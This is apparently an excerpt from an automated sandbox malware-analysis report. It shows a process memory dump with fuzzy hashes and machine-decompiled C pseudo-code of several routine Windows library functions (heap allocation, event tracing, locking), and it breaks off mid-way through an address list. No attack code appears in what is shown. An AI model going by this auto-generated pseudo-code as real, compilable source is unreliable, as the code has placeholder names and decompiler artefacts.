0x01644baa
0x00000000
0x0160006f
0x0160006f
0x00000000
0x0160006f
0x01600069

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 3c733dcfc78e43f8b737d6b8a0531d40b04adaed18784f625804030e6ba45321
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 8211C4326056828FE727D72CCD45B367BD4BF45794F0900A0EE05DB7D2DB29D842C260

Uniqueness

Uniqueness Score: -1.00%

Function 015E766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E015E766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0160F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0160F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L015F4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x015e7672
0x015e767f
0x015e7689
0x015e76de
0x015e76de
0x015e768b
0x015e7691
0x015e7693
0x015e7697
0x00000000
0x015e7699
0x015e76a8
0x00000000
0x015e76aa
0x015e76ad
0x015e76b1
0x00000000
0x015e76b3
0x015e76b3
0x015e76b5
0x015e76ba
0x015e76bc
0x015e76bc
0x015e76c0
0x00000000
0x015e76c2
0x015e76ce
0x015e76ce
0x015e76c0
0x015e76b1
0x015e76a8
0x015e7697
0x015e76d9

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: f562296f6fd4e4d172f3c336127069e62a9cadf3e78627caa42fda63c6d132bb
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: FD018D7270011AABD7259E5DDC45E5B7BEDFB88664B180564BB04CF250DA30DD0187E0

Uniqueness

Uniqueness Score: -1.00%

Function 015D9080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E015D9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x16c85ec;
				E015F2280(_t48, 0x16c85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E015EFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x16c538c; // 0x77f06828
					if( *_t84 != 0x16c5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x16af6e8);
						E0162D0E8(0x16c85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E016A88F5(_t80, _t85, 0x16c5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x16c86c0; // 0x11707b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x16c86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E015F2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E016A88F5(0x16c85ec, _t85, 0x16c5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0161AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x16cb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x16c84c0;
																			if(_t82 >=  *0x16c84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E016A9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E015D922A(_t99);
										_t64 = E015F7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E016A8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x16c86c0; // 0x11707b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x16c86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x16c86bc;
													_t87 = 0x16c86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E015D9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x16c86c4;
												_t87 = 0x16c86c0;
												L27:
												E01609B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0162D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x16c5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x16c538c = _t51;
						goto L6;
					}
				}
			}

0x015d9082
0x015d9083
0x015d9084
0x015d9085
0x015d9087
0x015d9096
0x015d9098
0x015d9098
0x015d909e
0x015d90a8
0x015d90e7
0x015d90e7
0x015d90aa
0x015d90b0
0x015d90b7
0x015d90bd
0x015d90dd
0x015d90e6
0x015d90bf
0x015d90bf
0x015d90c7
0x015d90cf
0x015d90f1
0x015d90f2
0x015d90f4
0x015d90f5
0x015d90f6
0x015d90f7
0x015d90f8
0x015d90f9
0x015d90fa
0x015d90fb
0x015d90fc
0x015d90fd
0x015d90fe
0x015d90ff
0x015d9100
0x015d9102
0x015d9107
0x015d910c
0x015d9110
0x015d9113
0x015d9115
0x015d9136
0x015d913f
0x015d9143
0x016337e4
0x016337e4
0x015d9117
0x015d9117
0x015d911d
0x00000000
0x015d911f
0x015d911f
0x015d9125
0x00000000
0x015d9127
0x015d912d
0x015d9130
0x015d9134
0x015d9158
0x015d915d
0x015d9161
0x015d9168
0x01633715
0x015d916e
0x015d916e
0x015d9175
0x015d9177
0x015d917e
0x015d917f
0x015d9182
0x015d9182
0x015d9187
0x015d9187
0x015d918a
0x015d918d
0x015d918f
0x015d9192
0x015d9195
0x015d9198
0x015d9198
0x015d9198
0x015d919a
0x00000000
0x00000000
0x0163371f
0x01633721
0x01633727
0x0163372f
0x01633733
0x01633735
0x01633738
0x0163373b
0x0163373d
0x01633740
0x00000000
0x01633746
0x01633746
0x01633749
0x00000000
0x0163374f
0x0163374f
0x01633751
0x01633757
0x01633759
0x0163375c
0x0163375c
0x0163375e
0x0163375e
0x01633761
0x01633764
0x00000000
0x00000000
0x01633766
0x01633768
0x016337a3
0x016337a3
0x016337a5
0x016337a7
0x016337ad
0x016337b0
0x016337b2
0x016337bc
0x016337c2
0x016337c2
0x016337b2
0x015d9187
0x015d9187
0x015d918a
0x015d918d
0x015d918f
0x015d9192
0x015d9195
0x00000000
0x015d9195
0x00000000
0x0163376a
0x0163376a
0x0163376a
0x0163376c
0x0163376c
0x0163376f
0x01633775
0x00000000
0x00000000
0x01633777
0x01633779
0x01633782
0x01633787
0x01633789
0x01633790
0x01633790
0x0163378b
0x0163378b
0x0163378b
0x01633792
0x01633795
0x00000000
0x01633795
0x00000000
0x01633779
0x01633798
0x00000000
0x01633798
0x00000000
0x01633768
0x0163379b
0x0163379b
0x01633751
0x01633749
0x00000000
0x01633740
0x015d91a0
0x015d91a3
0x015d91a9
0x015d91b0
0x00000000
0x015d91b0
0x015d9187
0x015d91b4
0x015d91b4
0x015d91bb
0x015d91c0
0x015d91c5
0x015d91c7
0x016337da
0x015d91cd
0x015d91cd
0x015d91cd
0x015d91d2
0x015d91d5
0x015d9239
0x015d9239
0x015d91d7
0x015d91db
0x015d91e1
0x015d91e7
0x015d91fd
0x015d9203
0x015d921e
0x015d9223
0x00000000
0x015d9205
0x015d9205
0x015d9208
0x015d920c
0x015d9214
0x015d9214
0x015d920c
0x015d91e9
0x015d91e9
0x015d91ee
0x015d91f3
0x015d91f3
0x015d91f3
0x015d91e7
0x00000000
0x00000000
0x00000000
0x015d9134
0x015d9125
0x015d911d
0x015d914e
0x015d90d1
0x015d90d1
0x015d90d3
0x015d90d6
0x015d90d8
0x00000000
0x015d90d8
0x015d90cf

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 403a521718811cd5a6b70ec38fd714439f068284bb952eae62d7324b5b4e5ea2
Instruction ID: 28450ef3a23a56f1f2c57ddd0b7b2b13113a291e83c0871d2de409e7a2f25dcc
Opcode Fuzzy Hash: 403a521718811cd5a6b70ec38fd714439f068284bb952eae62d7324b5b4e5ea2
Instruction Fuzzy Hash: 6201D1726012018FC3358F0CEC40B267BA9FB85724F25402BE605CF691D274EC41CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0166C450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0166C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E01619910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E016195B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E016195D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E016195D0();
				return L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0166c458
0x0166c45d
0x0166c466
0x0166c468
0x0166c469
0x0166c46a
0x0166c46b
0x0166c46e
0x0166c46f
0x0166c471
0x0166c476
0x0166c476
0x0166c47c
0x0166c47e
0x0166c480
0x0166c480
0x0166c483
0x0166c484
0x0166c486
0x0166c488
0x0166c48f
0x0166c491
0x0166c493
0x0166c493
0x0166c48f
0x0166c498
0x0166c49e
0x0166c4ad
0x0166c4ad
0x0166c4b2
0x0166c4b4
0x0166c4cd

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 73ad4a4468571a3841fa4813035d7d36052a893407a055fc0754eb00e037a2d5
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 7401B971141906BFE711AF69CC90E62FB7EFF54394F044529F25456660CB31ECA1C6A4

Uniqueness

Uniqueness Score: -1.00%

Function 016A4015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E016A4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E015F2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E015F2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x16c86ac);
					E015DF900(0x16c86d4, _t28);
					E015EFFB0(0x16c86ac, _t28, 0x16c86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E015EFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x016a401a
0x016a401e
0x016a4023
0x016a4028
0x016a4029
0x016a402b
0x016a402f
0x016a4043
0x016a4046
0x016a4051
0x016a4057
0x016a405f
0x016a4062
0x016a4067
0x016a406f
0x016a407c
0x016a407c
0x016a408c
0x016a408c
0x016a4097

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df8bcea927f5230df999c61c80b1142cfea8ee03dc4b5e9648a2ecec7a438769
Instruction ID: f65e546a9a267074d11dca130c62b7e36d41940d1c0b53a0e7cd44b5e9553bf6
Opcode Fuzzy Hash: df8bcea927f5230df999c61c80b1142cfea8ee03dc4b5e9648a2ecec7a438769
Instruction Fuzzy Hash: 5F0184716415477FD221AB79CD84E53B7ACFB99650B00022AB6188BA51CB24EC11CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 0169138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0169138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x16cd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0161FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E015F7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0161B640(E01619AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0169138a
0x0169138a
0x01691399
0x016913a3
0x016913a8
0x016913aa
0x016913b5
0x016913bb
0x016913c3
0x016913c6
0x016913c9
0x016913d4
0x016913e6
0x016913d6
0x016913df
0x016913df
0x016913f1
0x016913f2
0x016913f4
0x016913f9
0x0169140e

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c47bb8e5eb4991b330fd322103ed56fa105f5e69bd2d42ae08c57945ba08932
Instruction ID: 757eb6f2a80b8ef87f78f2f53b4c8410f2207515fef77bfe2fc4e2113912495c
Opcode Fuzzy Hash: 1c47bb8e5eb4991b330fd322103ed56fa105f5e69bd2d42ae08c57945ba08932
Instruction Fuzzy Hash: 77019E71A00219AFCB10DFA9DC41EAEBBB8EF45710F44406AB904EB380DA749E01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 016914FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E016914FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x16cd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0161FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E015F7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0161B640(E01619AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x016914fb
0x016914fb
0x0169150a
0x01691514
0x01691519
0x0169151b
0x01691526
0x0169152c
0x01691534
0x01691537
0x0169153a
0x01691545
0x01691557
0x01691547
0x01691550
0x01691550
0x01691562
0x01691563
0x01691565
0x0169156a
0x0169157f

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7c78682d18c6b19a5de5ed7ffca4c5fcbe61c0a01d99df400eae81e14fb1d7e
Instruction ID: 3c9c2aa111722f79b38ee25f8f55bc341e2a9f4494568e53b5bdbf2490e31ff3
Opcode Fuzzy Hash: e7c78682d18c6b19a5de5ed7ffca4c5fcbe61c0a01d99df400eae81e14fb1d7e
Instruction Fuzzy Hash: 2601B171A00259AFCB10DFA9DC41EAEBBB8EF45710F44406AF914EB380DA74DA01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 015D58EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E015D58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x16cd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x15b5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E015D5943() != 0 &&  *0x16c5320 > 5) {
					E01657B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01657B5E( &_v28, _t28);
					_t11 = E01657B9C(0x16c5320, 0x15bbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0161B640(_t11, _t17, _v8 ^ _t29, 0x15bbf15, _t27, _t28);
			}

0x015d58fb
0x015d58fe
0x015d5906
0x015d590a
0x015d593c
0x015d593c
0x015d590c
0x015d590c
0x015d5911
0x00000000
0x015d5913
0x015d5913
0x015d5913
0x015d5911
0x015d591d
0x01631035
0x0163103c
0x0163103f
0x01631056
0x01631056
0x015d593b

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ccc41d9c7f55dd0c35b93789c6fa2c763865b793b181682eb2950bffd3a3e08
Instruction ID: 019c8cae07ba85d1165b5a2701cd4365eadc8ad339b9d009ad5acca992357823
Opcode Fuzzy Hash: 8ccc41d9c7f55dd0c35b93789c6fa2c763865b793b181682eb2950bffd3a3e08
Instruction Fuzzy Hash: 57018F31B101099BD724EF6DDC049BE77B9FB96520F9404699A059B244FF31ED02C794

Uniqueness

Uniqueness Score: -1.00%

Function 016A1074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E016A1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E016A165E(__ebx, 0x16c8ae4, (__edx -  *0x16c8b04 >> 0x14) + (__edx -  *0x16c8b04 >> 0x14), __edi, __ecx, (__edx -  *0x16c8b04 >> 0x14) + (__edx -  *0x16c8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0169AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E015F7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0168FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x016a1074
0x016a1080
0x016a1082
0x016a108a
0x016a108f
0x016a1093
0x016a10ab
0x016a10ab
0x016a10c3
0x016a10cf
0x016a10e1
0x016a10d1
0x016a10da
0x016a10da
0x016a10e9
0x016a10f5
0x016a10f5
0x016a10fe

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8aaed0532ae6b3cf65f18b989969f36e03a898241abefea07e0e6a63012da22
Instruction ID: 406ee23dfb1c19f435f15fba3219c60509eefa9033ffde2cd38b8134f98623b2
Opcode Fuzzy Hash: e8aaed0532ae6b3cf65f18b989969f36e03a898241abefea07e0e6a63012da22
Instruction Fuzzy Hash: 25012472604742AFC720EF68CD04B1BBBEAAB95210F448629F985833D1EF30D950CB96

Uniqueness

Uniqueness Score: -1.00%

Function 015EB02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E015EB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E015F7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01657016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x015eb037
0x015eb039
0x015eb03b
0x015eb040
0x0163a60e
0x00000000
0x00000000
0x0163a61d
0x015eb04b
0x015eb04e
0x0163a627
0x0163a634
0x00000000
0x00000000
0x0163a641
0x0163a653
0x0163a643
0x0163a64c
0x0163a64c
0x0163a65b
0x00000000
0x00000000
0x00000000
0x0163a66c
0x015eb057
0x015eb057
0x015eb057
0x015eb046
0x015eb046
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 3fc087101c7ecef4cf894fb8ebad213dd213ef55c524d170c76d466920146180
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 3501D432601580DFE326C75CC848F667BE8FB86750F0900A1FA15CF661D728EC40D221

Uniqueness

Uniqueness Score: -1.00%

Function 0168FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0168FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x16cd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0161FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E015F7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0161B640(E01619AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0168fe3f
0x0168fe3f
0x0168fe4e
0x0168fe58
0x0168fe5d
0x0168fe5f
0x0168fe6a
0x0168fe72
0x0168fe75
0x0168fe78
0x0168fe83
0x0168fe95
0x0168fe85
